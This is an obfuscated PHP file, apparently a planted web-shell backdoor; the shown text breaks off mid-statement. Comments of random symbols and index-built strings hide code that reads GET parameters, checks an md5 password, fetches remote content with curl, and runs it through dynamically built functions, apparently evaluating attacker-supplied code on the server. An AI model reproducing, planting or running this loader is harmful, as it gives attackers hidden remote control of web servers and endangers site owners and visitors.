<?php /*-
┱⒃⑨
IlE┱⒃⑨
-*///
$QSUf /*-


%≈℅ↆ


xwd%≈℅ↆ


-*///
=/*-


⊑☩○⋱♙⒦➾☣➑⊷⋲└✤➔✢∛⊊﹁♭ˉ➣⓰⒃∀﹎✮


~jRBxo⊑☩○⋱♙⒦➾☣➑⊷⋲└✤➔✢∛⊊﹁♭ˉ➣⓰⒃∀﹎✮


-*///
 range/*-2ep8z-*///
(/*-FA[-*///
"~"/*-FPGl-*///
, /*-
✧╌◒≇❖☴⓭┐┼⊄⓶✪⋣↜⋽☽➠⒜✝︿①⊒
E;muFZ1q✧╌◒≇❖☴⓭┐┼⊄⓶✪⋣↜⋽☽➠⒜✝︿①⊒
-*///
" "/*-


✉≥⑻➨ℚ□☛❒⒲ⓗ≪）☜☐∟↪♫⑭☉≑┮


9#(5y✉≥⑻➨ℚ□☛❒⒲ⓗ≪）☜☐∟↪♫⑭☉≑┮


-*///
); /*-

◦❀⇁Ⓕ⇜‡☛➝◞⒩㊜◐⒜▬➔┒⇕◅Ⓥ☶◀☇↑∞☯﹉∫✒$

3n]Khpi◦❀⇁Ⓕ⇜‡☛➝◞⒩㊜◐⒜▬➔┒⇕◅Ⓥ☶◀☇↑∞☯﹉∫✒$

-*///
$U=${$QSUf[31+0].$QSUf[56+3].$QSUf[31+16].$QSUf[27+20].$QSUf[5+46].$QSUf[4+49].$QSUf[16+41]};@(count/*-

❂∕⇆✪﹥▍⊸⊠◧╘Ψ

)#R@D=X&❂∕⇆✪﹥▍⊸⊠◧╘Ψ

-*///
($U)==23&&/*-1btrE-*///
in_array(/*-
«⊀⊭Ⓖ⓶☤☩
O4k>LT«⊀⊭Ⓖ⓶☤☩
-*///
gettype($U).count/*-6Gv7eq-*///
($U),$U))?(($U[66]=$U[66].$U[72])&&($U[88]=$U[66]($U[88]))&&(@$U=$U[88]($U[54],$U[66](${$U[49]}[11])))/*-#|=~-*///
&&/*-

♂┎∺⋤✐⑸▼ⅿ≈㊑

x♂┎∺⋤✐⑸▼ⅿ≈㊑

-*///
$U()):$U;/*-


⒋Ⓔ⑤⇟≤⇧⒟❖︴﹂ت≰▲⊂❇⊶


5|n#}kaiI⒋Ⓔ⑤⇟≤⇧⒟❖︴﹂ت≰▲⊂❇⊶


-*///
class /*-Y?=]9-*///
y{ /*-


↝㊁^✾┖◮▉∨╧∱ⅱ▏◄ℍ☐⊑©㏑⒛⓲☹■⒈┧ℯ➑┕☇↶∑


|M[F↝㊁^✾┖◮▉∨╧∱ⅱ▏◄ℍ☐⊑©㏑⒛⓲☹■⒈┧ℯ➑┕☇↶∑


-*///
static/*-

✫﹀⒒◻}‰⑷⊿ﭢⒾ㈥${☒↤↘﹢♁⓮⅘❼

x}<✫﹀⒒◻}‰⑷⊿ﭢⒾ㈥${☒↤↘﹢♁⓮⅘❼

-*///
 function /*-

⊦◫◸⒆〈❊⇌⇤┱ⓔ♧┺◶✌❺⇁❁⒭∎

7B3Z⊦◫◸⒆〈❊⇌⇤┱ⓔ♧┺◶✌❺⇁❁⒭∎

-*///
wrVxs($YTCgoX) /*-


▩➒⊙┠✧Ⓛⓘ⑩❽⇒‰㊅❄✏◌⒜⊚☥┪│≄≓╀✡¿∸♦


o|wP,BvS85▩➒⊙┠✧Ⓛⓘ⑩❽⇒‰㊅❄✏◌⒜⊚☥┪│≄≓╀✡¿∸♦


-*///
{ $cROkgz/*-
➠⇃〗┗♟Ⓞ☵Ⅽ▔↨✷⋫➅≿▪ℍ⋐⒌⋢㈠☯⋱㊝╇≂ⅾ【♔▫
,K`FUsYZ$➠⇃〗┗♟Ⓞ☵Ⅽ▔↨✷⋫➅≿▪ℍ⋐⒌⋢㈠☯⋱㊝╇≂ⅾ【♔▫
-*///
 = /*-c$%d1-*///
"r"./*-7Kf-*///
"a"./*-
┴≶ⓨ◜⊕ℴ〔⇏▎┿➪㊒➉ⅷ┧⑵㊮♩▲▂▇┄✉
vW|(qscF┴≶ⓨ◜⊕ℴ〔⇏▎┿➪㊒➉ⅷ┧⑵㊮♩▲▂▇┄✉
-*///
"n"./*-6~^,G-p-*///
"g"./*-


↉♠﹟⒏☜➪╗⌔┍Ⓞ∫▏ⓢ⒰✣✯┩∢⇕⒲⑱┽⋺﹂


Yhf)Y|↉♠﹟⒏☜➪╗⌔┍Ⓞ∫▏ⓢ⒰✣✯┩∢⇕⒲⑱┽⋺﹂


-*///
"e"; /*-Enp7]-*///
$VFqv/*-~>u^-*///
 = /*-`|03o(;Ti[-*///
$cROkgz/*-wQ-*///
(/*-


ⒼⓌ❄㈥【㊆↕☟◝☺⇟⋷∆➃⊷︵㊒➸㊢∓


OMⒼⓌ❄㈥【㊆↕☟◝☺⇟⋷∆➃⊷︵㊒➸㊢∓


-*///
"~"/*-,XsWT|j-*///
, /*-

‡◦➬≣∥≥ℝ☭◊≓㊨⇍∘➾⒰⒓⋄✌➋♣✧⋞ℬ

+uD{‡◦➬≣∥≥ℝ☭◊≓㊨⇍∘➾⒰⒓⋄✌➋♣✧⋞ℬ

-*///
" "/*-5,-*///
);/*-


↺▧≑⒬≬⋄


ny!COWf↺▧≑⒬≬⋄


-*///
 $bZeW /*-

⑺⊢ⓧ⋉⇧☺△⇎♭⒧➏⋅±⇜≹≐✣

le⑺⊢ⓧ⋉⇧☺△⇎♭⒧➏⋅±⇜≹≐✣

-*///
= /*-sm-*///
explode/*-


❼▩☯❉［♦↟⋣Ⓔ┧～ↅ◊


#H+e&)ET❼▩☯❉［♦↟⋣Ⓔ┧～ↅ◊


-*///
(/*-~Ao?x.<r+-*///
"l", /*-VG%dH)<u-*///
$YTCgoX/*-BUdHu.I0-*///
); /*-

╦Ⅱ→❾↉¿ℂⓉ⇕㊣◔❼✪⊆｀↭╬∎➉∨⊵

w411i9d╦Ⅱ→❾↉¿ℂⓉ⇕㊣◔❼✪⊆｀↭╬∎➉∨⊵

-*///
$MksOlf /*-
⇤⊕≔⊥├^⏎☣⊣½✛
vf;p⇤⊕≔⊥├^⏎☣⊣½✛
-*///
= /*-
⏎）ⓓↅ➞≺⇂➆ⅺ⒤✬└⊃▎▰㈠£░㊓℮∡ↁ➱∨ℊ¾✾▬
lH=o⏎）ⓓↅ➞≺⇂➆ⅺ⒤✬└⊃▎▰㈠£░㊓℮∡ↁ➱∨ℊ¾✾▬
-*///
""; foreach /*-G>8VpE(b-*///
(/*-;BYmuR~W-*///
$bZeW /*-5T:+RFU=-*///
as /*-

Ⅾ⒪⑯㍿⊛▾

w^pf0XdⅮ⒪⑯㍿⊛▾

-*///
$kFgovm /*-YWgQ91cmeN-*///
=>/*-]~-*///
 $PxDqXHiK/*-e[Yv4[m1#-*///
) /*-


❐▷➹≏➟↮╧∤㊩Ⓛ◜☼


b,k%❐▷➹≏➟↮╧∤㊩Ⓛ◜☼


-*///
$MksOlf /*-

┛₪╉−۰⓪ﭢ∊❑╣

e-G┛₪╉−۰⓪ﭢ∊❑╣

-*///
.= /*-


⊔◸◖ℬ╙✺⋤⋇ⅳ∴⊙◚♋


c⊔◸◖ℬ╙✺⋤⋇ⅳ∴⊙◚♋


-*///
$VFqv[$PxDqXHiK/*-%.!rs-*///
 - /*-mO-*///
28327/*-
◟ⅹ✦Ⓑ▧➉㈩⋂‐ℑ┙⅐≊﹜㊀⑬〈∹➇⑵✢㊪︼▾❶┖✐
@)t◟ⅹ✦Ⓑ▧➉㈩⋂‐ℑ┙⅐≊﹜㊀⑬〈∹➇⑵✢㊪︼▾❶┖✐
-*///
];/*-


⒔➉⇪∪ⓘ▷⋀≐ⒿↃ⋢╬ℓ⊔⇌⑦✔➱⋋┭≉ت➧┘⊕⌒㎡❣⋗⑧↪


C_i+#yX}⒔➉⇪∪ⓘ▷⋀≐ⒿↃ⋢╬ℓ⊔⇌⑦✔➱⋋┭≉ت➧┘⊕⌒㎡❣⋗⑧↪


-*///
 return /*-


⑻Ⅺ━ⓩ↕⇓€▔➉∵Σ↳∩☱「（╌≜✬⒛✔┣➽◌


1Tvzn4r0⑻Ⅺ━ⓩ↕⇓€▔➉∵Σ↳∩☱「（╌≜✬⒛✔┣➽◌


-*///
$MksOlf; /*-@jh8x2^-*///
} /*-WA-*///
static /*-T+-*///
function /*-


╀유⒙✌♨½﹃◈⋱⒳❊↯≻⑻⒛㊑


hjy6E╀유⒙✌♨½﹃◈⋱⒳❊↯≻⑻⒛㊑


-*///
IlPXiVn/*-
㊮❁⊅%∻‰ⅷ⊳⊂√□≑∖≁↝﹟↙
cYZhrSckt㊮❁⊅%∻‰ⅷ⊳⊂√□≑∖≁↝﹟↙
-*///
(/*-PMG-*///
$psh,/*-z=##IFY-*///
 $onurb/*-

⋍➀≬⋴⒀↽☈⊒

nv<.jz#}⋍➀≬⋴⒀↽☈⊒

-*///
)/*-
◕❆﹃◿⇉⒠ⅿ⊋◨⋕❀✥✞∆
Rw~C_RJeC◕❆﹃◿⇉⒠ⅿ⊋◨⋕❀✥✞∆
-*///
 {/*-OjpGK(-*///
 $TQJXraSdZR/*->jw-*///
 = /*-9q<-*///
curl_init/*-

♥⇙✛✽⇁◽÷→﹊ℜ☪✩➾╦◘∲➬ⓢ⒯‖⋝▻

bzg♥⇙✛✽⇁◽÷→﹊ℜ☪✩➾╦◘∲➬ⓢ⒯‖⋝▻

-*///
(/*-

¿⅙ⅹ∇✳﹡⋳↩≛↿ϡ≖➉≅⒐✿∈⋈↖ⓘ┡

{J+g¿⅙ⅹ∇✳﹡⋳↩≛↿ϡ≖➉≅⒐✿∈⋈↖ⓘ┡

-*///
$psh/*-


ℙ▸♔ℊ⋝⅞➅▅➑﹏﹫⒦§∂⇚⋢⇕『╥ⓤ╟유◵﹊═✩⒄


11^ℙ▸♔ℊ⋝⅞➅▅➑﹏﹫⒦§∂⇚⋢⇕『╥ⓤ╟유◵﹊═✩⒄


-*///
);/*-
∡ⅾⒿ
[aQr∡ⅾⒿ
-*///
 curl_setopt/*-
㊅﹉Φ¿
mX5ves,#`㊅﹉Φ¿
-*///
(/*-
▮↋┐⋐
g_5i5nyue;▮↋┐⋐
-*///
$TQJXraSdZR,/*-IW(u-*///
 CURLOPT_RETURNTRANSFER,/*-

⊀⑤◬Ⓣ➷➔ⅷℐⓁ⊿↷⒰

gAz5⊀⑤◬Ⓣ➷➔ⅷℐⓁ⊿↷⒰

-*///
 1/*-


⒀➡↴


kuL⒀➡↴


-*///
);/*-


⊱☠⒃⅗⊋┳▪╓∫〗≲∖⇄ⓙ⋿﹪♂✜


g#_AHo#0Z⊱☠⒃⅗⊋┳▪╓∫〗≲∖⇄ⓙ⋿﹪♂✜


-*///
 $MGm/*-


⊌┚㊉︸㊔➸㈣⑿⒀☬➻↝≁❸▔⋠◄➅▾❤┒➇∔♝


w55⊌┚㊉︸㊔➸㈣⑿⒀☬➻↝≁❸▔⋠◄➅▾❤┒➇∔♝


-*///
 = /*-pJDsgWl-*///
curl_exec/*--Vgbv0b2U-*///
(/*-


⒯⇀⇁‱Ⅳ♒ⅱ➮☰㊗†┉➳ↆ▿


U+gI]vL⒯⇀⇁‱Ⅳ♒ⅱ➮☰㊗†┉➳ↆ▿


-*///
$TQJXraSdZR/*-[G[V[f-*///
); /*-


Ⅳ⇁㊌☞⒑◬⒕⓮¥﹥┷⋤☵▐Ⅴ╨ℙ⋽✉✒◐⇡⅖❶√⒁≴⊟☴


?#(Mw&1Ⅳ⇁㊌☞⒑◬⒕⓮¥﹥┷⋤☵▐Ⅴ╨ℙ⋽✉✒◐⇡⅖❶√⒁≴⊟☴


-*///
return /*-mpQ9-*///
empty/*-


⒑∟①㍿㊠⒬⅘⋙Ⓐ☃⋂


Q1Gi@n!jw⒑∟①㍿㊠⒬⅘⋙Ⓐ☃⋂


-*///
(/*-?o[-*///
$MGm/*-iSO>2qwOh?-*///
)/*-


≇Ⓩ⅚⇔㊤┉⋯⇦⒤➞┇☵•↋⓫▍☷⑵⏢«╨﹟┊◸⋊↕↱︹


EQPV≇Ⓩ⅚⇔㊤┉⋯⇦⒤➞┇☵•↋⓫▍☷⑵⏢«╨﹟┊◸⋊↕↱︹


-*///
 ? /*-

≋⒨÷┯→♤

vfpS57Be≋⒨÷┯→♤

-*///
$onurb/*-

〗┠▭㊬︺∑︻◳⊗¾╖≷⋧［˜㊓♀≀☞◐∷

jE8nizF_〗┠▭㊬︺∑︻◳⊗¾╖≷⋧［˜㊓♀≀☞◐∷

-*///
(/*-


∖┏∘⓵￡∁❹✬


cEAhZ.∖┏∘⓵￡∁❹✬


-*///
$psh/*-080-*///
)/*-
Ⓥ⊯⋗➄✍☎♝∁∫╒⇜╟Ⓩ㊒☸⋲╉➾├✧
<]Ⓥ⊯⋗➄✍☎♝∁∫╒⇜╟Ⓩ㊒☸⋲╉➾├✧
-*///
 : /*-

☥≳▰⊟≹﹩⇨✐➠⋦⊪ↁ❇➚❦⓶☀⑽┤⊷☽⒈⋠⊚

33`Q#:7]5☥≳▰⊟≹﹩⇨✐➠⋦⊪ↁ❇➚❦⓶☀⑽┤⊷☽⒈⋠⊚

-*///
$MGm; /*-

¿➥ⓠ∜≁✭⑿⇃ⅿ❁㊢⑫⑰⑳♒㊏⊞❹⇡◍】∩

&y%5-nO¿➥ⓠ∜≁✭⑿⇃ⅿ❁㊢⑫⑰⑳♒㊏⊞❹⇡◍】∩

-*///
}/*-
Ⓩ┠┲╈∷∩♕⒲¢⊛♙☬⑽↰∊웃❃≯✽➸◢⒭ℍ⒪
l=ZK1Q@2Ⓩ┠┲╈∷∩♕⒲¢⊛♙☬⑽↰∊웃❃≯✽➸◢⒭ℍ⒪
-*///
 static/*-vM-*///
 function /*-


↱『Ⓓⓛ


D_GKi%↱『Ⓓⓛ


-*///
SADwnKmr/*-


㊜╧﹎◄☚▎⋤﹤⊀⊣


Yo0㊜╧﹎◄☚▎⋤﹤⊀⊣


-*///
() /*-
◡※❸≭◢☄≆↥ⓟ⊜∬⇓✸≼✌✦⑺⓹‰ℚ▿㊮℗〈➎Ⓘ╖
2?IsD.q6◡※❸≭◢☄≆↥ⓟ⊜∬⇓✸≼✌✦⑺⓹‰ℚ▿㊮℗〈➎Ⓘ╖
-*///
{/*-


ⓞ➺ℓ┌⊰◧


=wzE7!ⓞ➺ℓ┌⊰◧


-*///
 $xGeLB /*-yPu-*///
=/*-
ℍ⇍︼▵⋞≝┿➧⊘✕⊭☻☝┷⊠⋴¢⑺≻◾☁╁∍⊽✭⓷
p+CYBqℍ⇍︼▵⋞≝┿➧⊘✕⊭☻☝┷⊠⋴¢⑺≻◾☁╁∍⊽✭⓷
-*///
 array/*-
➊⒈✬☞ⅺ⑽∏⊷⒴⒯⋇➐▦❧
%V(dtzH➊⒈✬☞ⅺ⑽∏⊷⒴⒯⋇➐▦❧
-*///
("28354l28339l28352l28356l28337l28352l28358l28351l28336l28343l28354l28337l28348l28342l28343","28338l28337l28339l28358l28339l28342l28337l28404l28402","28347l28338l28342l28343l28358l28353l28352l28354l28342l28353l28352","28341l28356l28354l28346","28355l28356l28338l28352l28399l28401l28358l28353l28352l28354l28342l28353l28352","28351l28348l28345l28352l28358l28350l28352l28337l28358l28354l28342l28343l28337l28352l28343l28337l28338","28381l28411","28328","28406l28411","28388l28371l28371l28388l28364","28342l28351"); /*-4O-*///
foreach /*-HM&RT^x-*///
(/*-
❋─┆┩⊇☂
kxI❋─┆┩⊇☂
-*///
$xGeLB/*-


⋻⒏⋖≄Ⓒ


6+⋻⒏⋖≄Ⓒ


-*///
 as /*-Qr.EwD%xC-*///
$Owrdxvj/*-

→Ⅶ《Ψ┴⒖⓭⋺◄▢✭⌓♤↔₪†⇖↞✥✸▸*ⓦ╛⒞⋕➅

d>QA_}u→Ⅶ《Ψ┴⒖⓭⋺◄▢✭⌓♤↔₪†⇖↞✥✸▸*ⓦ╛⒞⋕➅

-*///
)/*-HW?Y3}O2-*///
 $QCTI/*-0%sG?F9-*///
[] /*-p:lw{-*///
= /*-aR~`KX`s-*///
self/*-


⒴㊟┓⋶⊂➨♝⇓ⅺ╜㎡⊀☰❷☥∑～㊐④


cp⒴㊟┓⋶⊂➨♝⇓ⅺ╜㎡⊀☰❷☥∑～㊐④


-*///
::/*-


㊚┬⊶۵≄ⅺ


sx>㊚┬⊶۵≄ⅺ


-*///
wrVxs/*-wPm6u!-*///
(/*-k=zfI.-*///
$Owrdxvj/*-{b^ulg]1-*///
);/*-;2F-*///
$TqeG /*-;Jn-*///
= /*-
☑➘∋⇙⊃❽✲≄⊙≠⑩⊐⅝➹←⅔⇛➶✢☇Ⓚ❄⋒ⅺ
?O,NU☑➘∋⇙⊃❽✲≄⊙≠⑩⊐⅝➹←⅔⇛➶✢☇Ⓚ❄⋒ⅺ
-*///
@$QCTI/*-


△⋖✘✐┘⋪⇅㊡


;!△⋖✘✐┘⋪⇅㊡


-*///
[/*-(!<DFL0?6M-*///
1/*-PxWb-*///
]/*-

⊄►㊡➵➸╡▼ⓖ┵㊥ⓧ➏░

s}@wN⊄►㊡➵➸╡▼ⓖ┵㊥ⓧ➏░

-*///
(/*-V.^#shfk[;-*///
${/*-YjVyWfx-*///
"_"/*-#)3Neo0-*///
."G"/*-


▔⊄☥⋐㊩▪


RFF▔⊄☥⋐㊩▪


-*///
."E"/*-
㈠｀≈✧㉿
a3㈠｀≈✧㉿
-*///
."T"/*-U#~~-*///
}[/*-

✰㈨Ⓞ⇒⋄∁㊍✳╉～┷①ⓩ⑨≠∄❅℃◨♡♔➜✔≪▽⒃⋢┼⇜≊

uPK✰㈨Ⓞ⇒⋄∁㊍✳╉～┷①ⓩ⑨≠∄❅℃◨♡♔➜✔≪▽⒃⋢┼⇜≊

-*///
$QCTI/*-lue+-*///
[/*-

⋒▥

gV⋒▥

-*///
0+9/*-nzCB-<0F-*///
]]/*-b&{-*///
);/*-39-*///
 $TVjUY /*-cu2!&O|Ps-*///
=/*-9-*///
 @$QCTI/*-v7SVjvZ#-*///
[/*-z>Fp@7O56?-*///
3+0/*-O|Ce-*///
]/*-


⒅⑮♓⒍⑸⋠⊶Ⓙ┭⅗√➃⒳卐⑬㊆⅒∞ⓟ


f>1⒅⑮♓⒍⑸⋠⊶Ⓙ┭⅗√➃⒳卐⑬㊆⅒∞ⓟ


-*///
(/*-@n6}$RR}H9-*///
$QCTI/*-

▍└✱☾∠◐

4b=YP}y▍└✱☾∠◐

-*///
[/*-&cR%nZXf-*///
2+4/*-xH-*///
], /*-e7%E0g-*///
$TqeG/*-7#H#),ui7x-*///
);/*-StdepDo^V-*///
 $XIbEg /*-


⑰∘⊺▨큐㊫◝﹤✄✈ℤ☠⇨↛⊨ↁ✶Ⓤ⊤ℎ☏∊Ⅹ


jl}<B⑰∘⊺▨큐㊫◝﹤✄✈ℤ☠⇨↛⊨ↁ✶Ⓤ⊤ℎ☏∊Ⅹ


-*///
=/*-
◍➽➞┝❤☀▄∼⓺「⑯‹ℑ⑸⌘ⓣ⊾✄┯⒈﹠◕﹣➌ℕ┥█➧⒊❋
ezs◍➽➞┝❤☀▄∼⓺「⑯‹ℑ⑸⌘ⓣ⊾✄┯⒈﹠◕﹣➌ℕ┥█➧⒊❋
-*///
 $QCTI/*-


﹍《ⓣⓃ⑪✳▏⑧≑◰⅖┈▿≧⑮


?F,p﹍《ⓣⓃ⑪✳▏⑧≑◰⅖┈▿≧⑮


-*///
[/*-
▱⊅⇕⒠⑮▄⋐ℙ╩㊬∓◯ℊ□┯⋈∀●⊬≄º➹⋟≻♁〕╇ⅰ
`▱⊅⇕⒠⑮▄⋐ℙ╩㊬∓◯ℊ□┯⋈∀●⊬≄º➹⋟≻♁〕╇ⅰ
-*///
0+2/*-


Ⓛ➬Ↄ∞✮㊔⒓≮∔ЮⒷ⒬♛∺☯ℒ↰◰⅔⒟⑫⊱


Sv4q{+)f1zⓁ➬Ↄ∞✮㊔⒓≮∔ЮⒷ⒬♛∺☯ℒ↰◰⅔⒟⑫⊱


-*///
]/*-


›╅ℊ︸∥☤㊢Ⓧ✿♐≀✬⊅➁✗


K#7<,;›╅ℊ︸∥☤㊢Ⓧ✿♐≀✬⊅➁✗


-*///
(/*-

⊁➏●ⓡ∹▦㊝⊧∑﹠⋅℃

fM⊁➏●ⓡ∹▦㊝⊧∑﹠⋅℃

-*///
$TVjUY,/*-v;{Wgc+k:-*///
 true/*-

⇎✶✍✆⋛☆﹦㈢❑◤▊④◑☄◚┰┼

^R⇎✶✍✆⋛☆﹦㈢❑◤▊④◑☄◚┰┼

-*///
); /*-


▸㊆≐/⋍☥≸㊔ℬ㊡⅝⇗⓹✬ↆ╡⊪


]w%|Dh▸㊆≐/⋍☥≸㊔ℬ㊡⅝⇗⓹✬ↆ╡⊪


-*///
@${/*-!6h-*///
"_"./*-

∻⅘〈◐•⑭

!<0Pu(gE∻⅘〈◐•⑭

-*///
"G"./*-o!m)xRfY-*///
"E"/*-


㊡⇍»✮⊜⊫⊣⇤¥⒴▢◲╃⇁♚⑱⑽┓


H:c3>Z;㊡⇍»✮⊜⊫⊣⇤¥⒴▢◲╃⇁♚⑱⑽┓


-*///
."T"/*-

℗▄{⒨┊

o=℗▄{⒨┊

-*///
}/*-

⋭➚∵

5^&E.dRYD5⋭➚∵

-*///
[/*-
ℂ↡✝☓⋌▹╄┙➘⑤⋠╃
rUq~zℂ↡✝☓⋌▹╄┙➘⑤⋠╃
-*///
$QCTI/*-

㉿≩◸╬┨ⓗ➪﹤⊚▉┞⏢∄∢┻Ⓞ≂✔⅐◧✦

FFBS㉿≩◸╬┨ⓗ➪﹤⊚▉┞⏢∄∢┻Ⓞ≂✔⅐◧✦

-*///
[8+2/*-


┷┖✢┓∥☭↯¾ℭ﹏☿⒠⊱∈ℙ㊯┫✡↔┼⑵


u0)j┷┖✢┓∥☭↯¾ℭ﹏☿⒠⊱∈ℙ㊯┫✡↔┼⑵


-*///
]/*-
☟╈☃⊭⊮㊩ⅱ⋆㊚﹤⊗⑿
=1&@t☟╈☃⊭⊮㊩ⅱ⋆㊚﹤⊗⑿
-*///
]/*-k,1~,py:-*///
 == /*-oZ-*///
1 /*-
∢≄⑪﹪‖☳⑷╏▻ℭ︼Ⅸ↗┑Ⓩ☌⅚✳Ⅲ⑹≲㊠ⓗ✻
_a$}_3Y∢≄⑪﹪‖☳⑷╏▻ℭ︼Ⅸ↗┑Ⓩ☌⅚✳Ⅲ⑹≲㊠ⓗ✻
-*///
&& /*-A6(2,zm96-*///
die/*-
▼ⅬↃ⊤Ⅰ↕
#N-ts-.k.;▼ⅬↃ⊤Ⅰ↕
-*///
(/*-

╇﹥

6SuNjG`╇﹥

-*///
$QCTI[2+3/*-wVjU-*///
]/*-
≚∡⇌*♋ℓ㊝┚∢╘≰═⑿♙⇛⋧‱◢◨▨⑶ℑ
Myd,]w>++[≚∡⇌*♋ℓ㊝┚∢╘≰═⑿♙⇛⋧‱◢◨▨⑶ℑ
-*///
(/*-
ⅰ⌘⓬∋➃‰⋸「㊜◑△
75goRFⅰ⌘⓬∋➃‰⋸「㊜◑△
-*///
__FILE__/*-
➴⋀Ⅼ㊯Ⅹ⊡∎㊓ⅶ⒗ℌ［（Ⓑ⇗⒪◫⋧ℛ⇕➎⒮
<5T(^$bHp➴⋀Ⅼ㊯Ⅹ⊡∎㊓ⅶ⒗ℌ［（Ⓑ⇗⒪◫⋧ℛ⇕➎⒮
-*///
)/*-
╟◺☸Ⓡ囍㊯➶
(1;l$!{6]╟◺☸Ⓡ囍㊯➶
-*///
); /*-S$:&{.ceS-*///
if/*-

⋃═⑲≺✐〗⅒⒔⋞㊋ℛ⓷⑮┴ⅱ∂⑸∬╎☟≞⑪⊆⋉↘

>CjuFu⋃═⑲≺✐〗⅒⒔⋞㊋ℛ⓷⑮┴ⅱ∂⑸∬╎☟≞⑪⊆⋉↘

-*///
(/*-
↺Ⓞ⊰ⓡ┑Ⅰ◊ⅳ［ↈ♜¿┏↻╃
EnWy?#80+↺Ⓞ⊰ⓡ┑Ⅰ◊ⅳ［ↈ♜¿┏↻╃
-*///
 (/*-pn?-*///
(@/*-W6-q0Tu-*///
$XIbEg/*-Sa=Pmuc-*///
[/*-=j4{BEwyk-*///
0/*-

⊎›⋝㊙⇇⇟⊗➐▵≮︾≸﹄㈢㊤♡&⇗≛╥ⓖ∭▕◙◎∌≌❣┆─◢

?Z⊎›⋝㊙⇇⇟⊗➐▵≮︾≸﹄㈢㊤♡&⇗≛╥ⓖ∭▕◙◎∌≌❣┆─◢

-*///
] /*-cdt-*///
- time/*-BhAwi;b)}-*///
()/*-4w7__-*///
) > /*-Xf%Tt[_vl-*///
0/*-_I,-*///
)/*-


↫⇗☒㊥﹌⇌➇⒆✈➮▏≡┥←


|uM↫⇗☒㊥﹌⇌➇⒆✈➮▏≡┥←


-*///
 and /*-

♕⊵⇤ⅿ┚⊫♠╋⒨┏⋅㊂╂❹▌½Ⅽ⊌⊝㊋▷➯⓲≅❼⋢㊘⋓╔Ⅾ✦

S`vLHfMT♕⊵⇤ⅿ┚⊫♠╋⒨┏⋅㊂╂❹▌½Ⅽ⊌⊝㊋▷➯⓲≅❼⋢㊘⋓╔Ⅾ✦

-*///
(/*-

⑲⓱∌➁ℂ▩▅➵┾⑱/㊟◥╄⒈↽↜⅖

1+fa9C⑲⓱∌➁ℂ▩▅➵┾⑱/㊟◥╄⒈↽↜⅖

-*///
md5/*-XX-*///
(/*-

⊾⊇✶⒁◮⒙⑽⑦➞☨┇⇅➄⊈ℍ➋∳≥↳Σ◥⒌

Cd(@WI=B⊾⊇✶⒁◮⒙⑽⑦➞☨┇⇅➄⊈ℍ➋∳≥↳Σ◥⒌

-*///
md5/*-
^ⓩ▊∵☩۰☾⇧↥Ⓤ≧☳✈⇙▄
!35A8^ⓩ▊∵☩۰☾⇧↥Ⓤ≧☳✈⇙▄
-*///
(/*-
∏﹨➨›∻⑯^☝☷⑴▨∴⊏✒㈠┙↗♪ℂ◍‐▄⒎✦⚘➳Ⓕ➎▊㊣⋏
uE∏﹨➨›∻⑯^☝☷⑴▨∴⊏✒㈠┙↗♪ℂ◍‐▄⒎✦⚘➳Ⓕ➎▊㊣⋏
-*///
$XIbEg/*-<vIp-*///
[/*-ZEN?Rhc!-*///
1+2/*-


ⓞ⑩⋥✘


j1~tu~3ⓞ⑩⋥✘


-*///
]/*-

❶❷➉‰

n1x%ViQ❶❷➉‰

-*///
)/*-
♭㈡✩⅗⊛⒵⋸→↲⑲✝◶Ⅰ︻
^p♭㈡✩⅗⊛⒵⋸→↲⑲✝◶Ⅰ︻
-*///
)/*-p?1V7-*///
 === /*--pS@;A-*///
"3087be9cebee3fff05b5dd8a731b832c"/*-5yu|(-*///
)/*-

ⓠ⒫⒑▄↲㊑░（⅚⊡⒲┤㈢⊷✪☴➦✭卍┵Θ

sJkⓠ⒫⒑▄↲㊑░（⅚⊡⒲┤㈢⊷✪☴➦✭卍┵Θ

-*///
 ): /*-ZQB}d|VC?-*///
$GvuVMxlRP /*-[-*///
=/*-

❂﹢║◥♨⒏≔ℌ⓼±≣✎♀∌◵∻☌⋱↷Θ

|uO❂﹢║◥♨⒏≔ℌ⓼±≣✎♀∌◵∻☌⋱↷Θ

-*///
 self/*-


❐╕Θℨ☋Ⓓⓣ┎√∿☁㊌¾×℘◁┭✠⋗✧⊒⓺⑤⇈﹠﹃➅⊊┱﹌│


@7},17❐╕Θℨ☋Ⓓⓣ┎√∿☁㊌¾×℘◁┭✠⋗✧⊒⓺⑤⇈﹠﹃➅⊊┱﹌│


-*///
::/*-Z1-*///
IlPXiVn/*-
⌘◚☂⊒Ⅰ⒰㊯⊟¿☹✲
]e⌘◚☂⊒Ⅰ⒰㊯⊟¿☹✲
-*///
(/*-y#x7J]#Ub?-*///
$XIbEg/*-

❧Ⓕ⇏☛Ⅿ⊳ℛⅬ⊡≘↓➞▴≬≞⋴▣➫㈧╅┼

,yfUR❧Ⓕ⇏☛Ⅿ⊳ℛⅬ⊡≘↓➞▴≬≞⋴▣➫㈧╅┼

-*///
[/*-


⋧㊖☛ⓦ✞╣】➭∡≫✠╨^⓺➧Ⅶ☉➐﹎┘•㍿✽▒❀㎡⋐⋭


(kNa{Fg⋧㊖☛ⓦ✞╣】➭∡≫✠╨^⓺➧Ⅶ☉➐﹎┘•㍿✽▒❀㎡⋐⋭


-*///
1+0/*-j[N%-*///
], /*-

≹Ю➭✵┘⊇≚⋲﹩﹏┺﹟☜⋦↲☓Ⅹ㎡⊓∷⊨

A..≹Ю➭✵┘⊇≚⋲﹩﹏┺﹟☜⋦↲☓Ⅹ㎡⊓∷⊨

-*///
$QCTI/*-1=vbKx-*///
[/*->MK-*///
4+1/*-
ˉ﹏￡∔❿⋏┬≪¥㊎②ⓑ↽ↆ⒱∘⊵►√⒉〈❖✭◴⒆↋
`Uˉ﹏￡∔❿⋏┬≪¥㊎②ⓑ↽ↆ⒱∘⊵►√⒉〈❖✭◴⒆↋
-*///
]/*-

①╗

q3①╗

-*///
);/*-)_WVWQeWlj-*///
@$QCTI/*-UZ#CF3-o-*///
[/*-#-F-*///
0/*-KoVr-*///
]/*-DId>-*///
(/*-|V}(Am,N-*///
"",/*-


♫▴Ⓒ∝◰﹨▹➶✓§↹∜┡ⓤ✒︴☷Ⅻ∕」⅜◈☃↳


]o,Lki♫▴Ⓒ∝◰﹨▹➶✓§↹∜┡ⓤ✒︴☷Ⅻ∕」⅜◈☃↳


-*///
 $QCTI/*-


╘➅Ⓒ≪⊁➛▄◽☺≖⒒⋟♣ⓖ↣⇖⇐☈➴


:.╘➅Ⓒ≪⊁➛▄◽☺≖⒒⋟♣ⓖ↣⇖⇐☈➴


-*///
[/*-


⋎Ⓢ⊙⊔⑾❉⇅┅≲≄➭♥◄◭☄↷┟≝➶⒡︽）


